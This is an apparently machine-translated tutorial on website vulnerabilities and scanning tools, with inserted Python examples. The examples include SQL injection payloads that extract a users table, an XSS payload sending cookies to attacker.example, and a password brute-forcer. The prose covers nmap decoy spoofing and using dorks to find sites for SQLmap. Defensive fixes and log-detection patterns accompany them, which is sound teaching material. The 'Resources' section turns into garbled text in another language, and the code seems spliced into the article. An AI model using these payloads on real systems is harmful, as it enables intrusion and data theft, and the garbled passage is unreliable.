Website vulnerabilities. Website check. Programs for checking a site for vulnerabilities
The question of website security has never been as pressing as it is in the 21st century. The reason is obvious: the Internet now reaches into almost every industry and field. Every day hackers and security specialists find several new web vulnerabilities. Many of them are closed immediately by site owners and developers, but some remain open, and those are the ones attackers exploit. A compromised site can do serious harm both to its visitors and to the servers it is hosted on.
Types of site vulnerabilities
Building web pages involves a large number of interrelated technologies. Some are mature and time-tested, others are new and not yet worn in. Either way, site vulnerabilities fall into many types:
- XSS (cross-site scripting). A site has some kind of form. Users type data into it and get a result, register, or send messages. If specially crafted values are submitted through the form and echoed back without escaping, a script chosen by the attacker runs in other visitors' browsers, which can lead to a breach of the site's integrity and to data being compromised.
- SQL injection. A very common and effective way to get at confidential data. It can happen either through the address bar or through a form. The attacker submits values that the scripts do not filter out, so they become part of the query sent to the database. With the right knowledge this leads to a full breach of the data.
- HTML injection. Very similar to XSS, except that what is injected is not script code but HTML markup.
- Files and directories left in their default locations. For example, knowing the structure of the CMS, an attacker can go straight to the admin panel or to configuration files.
- An insufficiently hardened operating system on the server. If such a weakness exists, an attacker may be able to execute arbitrary code on the host.
- Weak passwords. One of the most obvious vulnerabilities: simple values protecting accounts, especially the administrator's.
- Buffer overflow. Input longer than the memory buffer reserved for it overwrites adjacent memory, which can let an attacker alter the program's data or control flow. It occurs in software that does not check input lengths.
- Cloning your site (phishing). The attacker builds an exact copy of the site at another address; a user who cannot tell it from the original enters personal data, which ends up with the attacker.
- Denial of service. Usually this term means an attack in which the server receives more requests than it can handle and simply 'falls over' or stops serving real users. The weakness here is the lack of properly configured rate limiting or IP filtering.
Scanning a site for vulnerabilities
Security specialists carry out a special audit of web resources, looking for errors and flaws that could lead to a break-in. Such a site check is called pentesting (penetration testing). It examines the source code of the CMS in use and the presence of vulnerable modules, and includes many other interesting tests.
SQL injection
This type of check establishes whether the script filters the values it receives before building queries to the database. A simple test can be done by hand. How do you find an SQL vulnerability on a site? Here is the idea.
Say there is a site my-sayt.rf. Its front page has a catalogue. Opening it, you see something like my-sayt.rf/?product_id=1 in the address bar. Most likely this value is passed straight into a database query. To look for the vulnerability, first try appending a single quote to the value, so that the address becomes my-sayt.rf/?product_id=1'. If pressing Enter makes the page show a database error, the vulnerability is there.
After that you can use various techniques to extract data: UNION-based queries, error-based and boolean (true/false) conditions, comment sequences to cut off the rest of the query, and many others.
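The probe described above can be reproduced offline against a tiny stand-in for the catalogue. The following Python is an added example, not code from the article: the sqlite3 database, the `products` and `users` tables and the two handlers are constructed for illustration. It runs the quote test, a boolean payload and a UNION payload against a handler that pastes `product_id` into the query text, and then the same payloads against a handler that binds the value as a parameter, which is the input filtering the tips at the end of this article call for.

```python
import sqlite3

# Constructed stand-in for the site's database (not the article's own schema).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price INTEGER);
        CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pw_hash TEXT);
        INSERT INTO products VALUES (1, 'Laptop', 900), (2, 'Mouse', 20);
        INSERT INTO users VALUES (1, 'admin', 'deadbeef');
    """)
    return db

# Vulnerable handler: the raw product_id from the URL is glued into the SQL text.
def product_vulnerable(db, product_id):
    sql = "SELECT name, price FROM products WHERE id = " + product_id
    return db.execute(sql).fetchall()

# Hardened handler: the value is bound as a parameter, so it is data, never SQL.
def product_safe(db, product_id):
    return db.execute(
        "SELECT name, price FROM products WHERE id = ?", (product_id,)
    ).fetchall()

# The probes from the text: the lone quote, a boolean condition, a UNION pull.
PAYLOADS = {
    "quote": "1'",
    "boolean": "1 OR 1=1",
    "union": "0 UNION SELECT login, pw_hash FROM users",
}

def run_probes(db, handler):
    """Send each payload through a handler. 'ERROR' marks a database error,
    which is exactly the signal the manual quote test looks for."""
    results = {}
    for name, value in PAYLOADS.items():
        try:
            results[name] = handler(db, value)
        except sqlite3.Error:
            results[name] = "ERROR"
    return results

def is_injectable(db, handler):
    """True when the quote probe breaks the query: input reaches SQL unfiltered."""
    return run_probes(db, handler)["quote"] == "ERROR"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", run_probes(db, product_vulnerable))
    print("safe:      ", run_probes(db, product_safe))
```

Against the vulnerable handler the quote raises an error, the boolean payload returns every product and the UNION payload returns the admin's password hash; against the parameterised handler all three return nothing, because the whole string is compared with the integer id and never parsed as SQL.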
XSS
This vulnerability comes in two forms: active (stored) and passive (reflected).
Active means that a piece of code is written into the database or into a file on the server, so it runs for every visitor who opens the affected page. It is the more dangerous and insidious of the two.
Passive mode requires luring the victim to a specific site address that carries the malicious code in its parameters.
Using XSS, an attacker can steal cookies, which may contain important user data. An even worse outcome is hijacking the session itself.
A hacker can also use a script on the site to make a form hand the data a user enters, at the moment of sending, straight to the attacker.
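An added example (not from the article) of both sides of the cookie theft described above, in Python: a constructed payload that ships `document.cookie` to an attacker's host, a template that reflects user input raw next to one that escapes it with `html.escape`, and a session cookie issued with the `HttpOnly` flag so that a script cannot read it even if one does run. The host name `attacker.example` and the session value are invented for the example.

```python
import html
from http.cookies import SimpleCookie

# Constructed payload: a reflected script that ships the cookie jar to the attacker.
COOKIE_THIEF = (
    "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>"
)

def render_unsafe(username):
    """Interpolates the value straight into the page: a script tag survives intact."""
    return f"<p>Welcome, {username}!</p>"

def render_safe(username):
    """Escapes <, >, & and both quote characters into entities, so the browser
    shows the payload as text instead of executing it."""
    return f"<p>Welcome, {html.escape(username, quote=True)}!</p>"

def has_active_markup(page):
    """Crude check a tester might run on a response: does the input come back live?"""
    low = page.lower()
    return any(marker in low for marker in ("<script", "onerror=", "javascript:"))

def session_cookie(session_id):
    """Issue the session cookie so that document.cookie cannot read it (HttpOnly),
    it only travels over TLS (Secure) and is not sent on cross-site requests (SameSite)."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Lax"
    return jar["session"].OutputString()

if __name__ == "__main__":
    print(render_unsafe(COOKIE_THIEF))
    print(render_safe(COOKIE_THIEF))
    print("Set-Cookie:", session_cookie("7f3a9c"))
```

Escaping at output time covers both the stored and the reflected variant, since it does not matter whether the payload came from the database or from the URL. `HttpOnly` is the second line of defence: it does not stop the script from running, but it keeps the session id out of `document.cookie`.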
Using automated search tools
On the web you can find many interesting site vulnerability scanners. Some come on their own, others are bundled together into a single distribution, as in Kali Linux. Below is a short overview of the most popular tools for automating the collection of vulnerability information.
Nmap
The simplest scanner for checking a site, showing details such as the operating system in use, open ports and services. Typical form:
nmap -sS 127.0.0.1, where the local IP address should be replaced with the address of the site actually being tested (the SYN scan selected by -sS needs root privileges).
The resulting report shows which services are running on the host and which ports are open at that moment. With this information you can check the services found against already known vulnerabilities.
Here are a few nmap keys for a more thorough scan:
- -A. Aggressive scan that produces a lot of output, but can take a long time.
- -O. Tries to determine the operating system running on the server.
- -D. Spoofs decoy IP addresses from which the scan appears to come, so that in the server logs it is hard to tell where the scan actually originated.
- -p. Port range. Checks several services for being open.
- -S. Sets the source IP address (spoofing the scanner's own address).
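To make concrete what an nmap port scan reports, here is an added Python example, which is not part of the article and is not nmap itself: a plain TCP connect scan, the equivalent of nmap -sT rather than the SYN scan of -sS, which also grabs the first bytes each open service sends. The demo listener and its SSH-style banner are constructed so the scanner can be tried against 127.0.0.1 offline.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

def probe_port(host, port, timeout=0.5):
    """Full TCP handshake to one port (what nmap -sT does); returns (port, open, banner)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as conn:
            conn.settimeout(timeout)
            try:
                banner = conn.recv(128).decode("ascii", "replace").strip()
            except (socket.timeout, OSError):
                banner = ""       # open, but the service waits for the client to talk
            return port, True, banner
    except OSError:
        return port, False, ""    # refused, filtered or timed out

def connect_scan(host, ports, workers=32):
    """Scan the given ports concurrently; returns {port: banner} for open ones only."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: probe_port(host, p), ports))
    return {port: banner for port, is_open, banner in results if is_open}

def start_demo_listener(banner=b"SSH-2.0-demo\r\n"):
    """Constructed local service for trying the scanner offline; returns its port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            conn.sendall(banner)
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def free_port():
    """A port that is currently closed, for a negative check."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]

if __name__ == "__main__":
    demo = start_demo_listener()
    # Only ever scan hosts you own or are authorised to test.
    targets = [demo, free_port(), 22, 80]
    for port, banner in sorted(connect_scan("127.0.0.1", targets).items()):
        print(f"{port}/tcp open  {banner!r}")
```

A connect scan completes the handshake, so it shows up in the target's logs as a normal connection; that is the trade-off nmap's -sS avoids by never sending the final ACK, at the price of needing raw sockets.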
WPScan
This site checking program is included in the Kali Linux distribution. It is made for checking web resources running the WordPress CMS. It is written in Ruby, so it is started like this:
ruby ./wpscan.rb --help. This command shows all the available options and keys.
A simple test can be run with the command:
ruby ./wpscan.rb --url some-sayt.ru
All in all, WPScan is a fairly easy-to-use utility for checking your WordPress site for holes.
Nikto
A program for checking sites for vulnerabilities, also available in the Kali Linux distribution. For such a simple tool it has rich functionality:
- scanning over both HTTP and HTTPS;
- evasion techniques for many intrusion detection systems;
- checking several ports, including non-standard ones;
- support for proxy servers;
- the ability to write and plug in plugins.
To start nikto, perl must be installed on the system. The simplest check is done as follows:
perl nikto.pl -h 192.168.0.1
The program can also be 'fed' a text file listing web server addresses:
perl nikto.pl -h file.txt
This tool is useful not only to security specialists doing pentests, but also to network administrators and site owners keeping their sites healthy.
Burp Suite
A very powerful tool for checking not just sites but anything on the network. It has built-in facilities for modifying the requests sent to the server under test. Its scanner can search for several types of vulnerability at once. The results of the current session can be saved and the work resumed later. It is flexible enough to use not only third-party plugins but ones you write yourself.
The utility has its own graphical user interface, which is undoubtedly convenient, especially for beginners.
SQLmap
Probably the most convenient and powerful tool for finding and exploiting SQL injection. Its advantages can be summed up as:
- support for almost all database management systems;
- six basic techniques for detecting and exploiting SQL injection (boolean-based blind, error-based, UNION query, stacked queries, time-based blind and inline queries);
- enumeration of users, their hashes, passwords and other data.
Before using SQLmap, a vulnerable site is usually found first through dorks, search-engine queries that help filter out the web resources of interest.
Then the page address is passed to the program and it does the analysis. If a vulnerability is confirmed, the utility can itself exploit it to gain full access to the resource.
Webslayer
A small utility for brute-force attacks. It can 'brute' forms and site parameters. It supports multithreading, which helps performance. It can also guess passwords recursively across nested pages. Proxy support is included.
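As an added illustration (not code from the article or from Webslayer) of what a form brute-force does, and why the strong-password tip at the end of the article matters, the following Python tries a constructed wordlist against a constructed account store, then adds the lockout that the login form should have had. The account names, passwords and wordlist are invented for the example.

```python
import hashlib
import secrets
import time
from collections import defaultdict

# Constructed wordlist of the kind a brute-forcer is fed.
WORDLIST = ["123456", "password", "admin", "admin123", "qwerty", "letmein"]

def _digest(salt, password):
    return hashlib.sha256(salt + password.encode()).hexdigest()

def make_accounts(creds):
    """Constructed account store: login -> (salt, salted SHA-256 of the password)."""
    store = {}
    for login, password in creds.items():
        salt = secrets.token_bytes(8)
        store[login] = (salt, _digest(salt, password))
    return store

def check_login(store, login, password):
    """The target form's check: True when the credentials match."""
    if login not in store:
        return False
    salt, stored = store[login]
    return secrets.compare_digest(stored, _digest(salt, password))

def brute_force(store, login, wordlist):
    """Dictionary attack on one account, one guess per form submission."""
    for candidate in wordlist:
        if check_login(store, login, candidate):
            return candidate
    return None

class Lockout:
    """Defence: after `limit` failures within `window` seconds, refuse further logins."""

    def __init__(self, limit=5, window=900):
        self.limit, self.window = limit, window
        self.failures = defaultdict(list)     # login -> timestamps of failed attempts

    def attempt(self, store, login, password, now=None):
        now = time.time() if now is None else now
        recent = [t for t in self.failures[login] if now - t < self.window]
        self.failures[login] = recent
        if len(recent) >= self.limit:
            return "locked"
        if check_login(store, login, password):
            self.failures[login].clear()
            return "ok"
        self.failures[login].append(now)
        return "denied"

if __name__ == "__main__":
    store = make_accounts({"admin": "admin123", "ops": "gX7!rT2#vLq9wPz4"})
    print("admin:", brute_force(store, "admin", WORDLIST))   # weak: found in the list
    print("ops:  ", brute_force(store, "ops", WORDLIST))     # strong: None
```

A per-account lockout on its own lets an attacker lock the administrator out on purpose, so in practice it is combined with per-IP rate limiting and, ideally, a second factor.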
Resources kuongorora
In nemambure pane zvishandiso wandei kuedza munjodzi paIndaneti nzvimbo:
- coder-diary.ru. Simple nzvimbo kunovhenekwa. Just kupinda kero, kuti riwedzere uye tinya "Check". The kutsvaka anogona kutora nguva refu, saka unogona tsanangurai email address kuti vauye pakupera mugumisiro zvakananga kumucheri bvunzo. pane anenge 2,500 anozivikanwa kubatsirwa mune nzvimbo.
- https://cryptoreport.websecurity.symantec.com/checker/. Online Service cheki nokuda SSL uye TLS chitupa kubva kambani Symantec. Zvinoda chete kero, kuti upfumi.
- https://find-xss.net/scanner/. The chirongwa chinhu chakaparadzana PHP faira kutarira Websites nokuda kubatsirwa kana ZIP arşive. Unogona kutaridzwa mhando mafaira kuti tarisa uye zviratidzo, izvo kudzivirirwa pachishandiswa mashoko ari manyorero.
- http://insafety.org/scanner.php. Scanner yokuedza nzvimbo pachikuva "1C-Bitrix". Simple uye nzwisisa inowanikwa.
The algorithm for checking for vulnerabilities
Any network security specialist checks a site using a simple algorithm:
- First, by hand or with automated tools, determine whether the site has vulnerabilities. If so, establish their type.
- Depending on the type of vulnerability found, plan the next moves. For example, if the CMS is known, pick the attack method that suits it. If it is SQL injection, craft the queries to the database.
- The main goal is to obtain privileged access to the administrative panel. If that cannot be achieved, it may be worth trying to build a crafted address with your own script embedded and passing it to the victim.
- If the attack or penetration fails, data gathering begins: which other vulnerabilities and flaws are present.
- Based on this data, the specialist tells the site owner about the problems and how to fix them.
- The vulnerabilities are then eliminated either by the owner's own hands or with the help of outside experts.
A few security tips
Anyone developing their own site will find these simple tips and tricks useful.
Incoming data must be filtered, and for database queries passed as bound parameters, so that scripts or queries cannot run on their own or give away data from the database.
Use complex and strong passwords for the admin panel to rule out brute-force guessing.
If the site is built on a CMS, update it as often as possible and use only verified plugins, templates and modules. Do not overload the site with unnecessary components.
Check the server logs regularly for any suspicious events or actions.
Check your site with several scanners and services.
Correct server configuration is the key to its stable and safe operation.
Wherever possible, use an SSL/TLS certificate. This prevents personal or confidential data being intercepted between the server and the user.
Security tools. It makes sense to install or enable software that prevents intrusions and blocks external threats.
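For the tip about checking server logs, here is an added Python example, not from the article, that runs the patterns discussed in it (the quote and UNION probes, a script tag, admin paths, and a burst of login POSTs from one address) over a constructed Apache-style access log. The sample lines and the addresses in them are made up for the example.

```python
import re
from collections import Counter

# Constructed Apache-style access log (addresses are documentation ranges, not real).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /?product_id=1 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /?product_id=1' HTTP/1.1" 500 612
203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET /?product_id=0%20UNION%20SELECT%20login,pw_hash%20FROM%20users HTTP/1.1" 200 5120
198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 800
198.51.100.9 - - [10/Oct/2023:13:56:05 +0000] "GET /wp-admin/ HTTP/1.1" 302 0
192.0.2.33 - - [10/Oct/2023:13:57:00 +0000] "POST /wp-login.php HTTP/1.1" 200 1200
192.0.2.33 - - [10/Oct/2023:13:57:01 +0000] "POST /wp-login.php HTTP/1.1" 200 1200
192.0.2.33 - - [10/Oct/2023:13:57:02 +0000] "POST /wp-login.php HTTP/1.1" 200 1200
192.0.2.33 - - [10/Oct/2023:13:57:03 +0000] "POST /wp-login.php HTTP/1.1" 200 1200
192.0.2.33 - - [10/Oct/2023:13:57:04 +0000] "POST /wp-login.php HTTP/1.1" 200 1200
192.0.2.33 - - [10/Oct/2023:13:57:05 +0000] "POST /wp-login.php HTTP/1.1" 200 1200
192.0.2.50 - - [10/Oct/2023:13:58:00 +0000] "GET /about HTTP/1.1" 200 2300
"""

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures for the probes discussed in the article, matched on the raw request path.
PROBES = {
    "sqli": re.compile(r"%27|'|union(\+|%20|\s)+select|or(\+|%20|\s)+1=1", re.I),
    "xss": re.compile(r"<script|%3cscript|onerror=|javascript:", re.I),
    "admin_path": re.compile(r"^/(wp-admin|admin|phpmyadmin)(/|$)", re.I),
}

def parse_line(line):
    """Parse one common-log-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def scan_log(lines, auth_paths=("/wp-login.php",), burst=5):
    """Return (probe findings as (kind, ip, path) tuples,
               {ip: count} of addresses that POSTed to a login path `burst` or more times)."""
    findings = []
    login_posts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for kind, rx in PROBES.items():
            if rx.search(rec["path"]):
                findings.append((kind, rec["ip"], rec["path"]))
        if rec["method"] == "POST" and rec["path"].split("?", 1)[0] in auth_paths:
            login_posts[rec["ip"]] += 1
    bursts = {ip: n for ip, n in login_posts.items() if n >= burst}
    return findings, bursts

def suspicious_ips(lines, **kw):
    """Addresses worth a closer look: any probe plus any login burst."""
    findings, bursts = scan_log(lines, **kw)
    return sorted({ip for _, ip, _ in findings} | set(bursts))

if __name__ == "__main__":
    findings, bursts = scan_log(SAMPLE_LOG.splitlines())
    for kind, ip, path in findings:
        print(f"{kind:10} {ip:14} {path}")
    print("login bursts:", bursts)
```

The signatures are deliberately loose (a lone quote in a path is enough to flag a line), which suits a periodic review where a few false positives cost little; for an automated block list they would need tightening, and the login-burst threshold should be tuned to the site's real traffic.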
Conclusion
The article has turned out fairly long, but even so it is not enough to describe every aspect of web security in detail. To cope with information security problems you have to study a lot of material and instructions, and master a whole set of tools and technologies. You can also seek advice and help from specialist companies that do pentesting and audits of web resources. Although their services cost a fair amount of money, a compromised site can cost far more, both financially and in reputation.